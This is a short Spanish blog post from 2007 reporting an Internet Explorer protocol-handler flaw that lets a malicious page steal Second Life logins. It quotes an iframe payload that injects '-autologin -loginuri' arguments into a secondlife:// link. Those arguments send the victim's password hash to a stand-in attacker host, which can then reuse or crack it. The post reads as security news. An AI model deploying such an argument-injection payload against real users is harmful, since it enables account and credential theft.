Mariam Kidd en Second Life: Robo de identidades en Second Life mediante Explorer

lunes, 17 de septiembre de 2007

0

Robo de identidades en Second Life mediante Explorer

KRIPTÓPOLIS
Según acaba de publicar GNU Citizen (y confirma Sergio Maone, creador de NoScript), nuestro viejo amigo el bug "compartido" (sí, ése sobre el que un preclaro MVP de Microsoft asegura que esta empresa no tiene ninguna responsabilidad) permite que te roben impunemente tu "existencia" en Second Life, un mundo virtual... donde también se hacen negocios reales.
Tan sencillo como hacer que la víctima visite con Explorer una página maliciosa con el siguiente contenido:
((iframe src='secondlife://" -autologin -loginuri "http://web.atacante.com/sl/record-login.php'>
/iframe>))
Se provoca así el arranque del cliente de Second Life, que intenta loguearse automáticamente en la web del atacante. Un script situado en ésta recoge el hash MD5 de la contraseña, que puede ser utilizado directamente para loguearse, o bien pasarse por unas rainbow tables para extraer la contraseña en claro...
Maone lamenta (quizás irónicamente) que esta vez, al tratarse de Explorer, NoScript no pueda protegernos.

0 Susurros en la noche: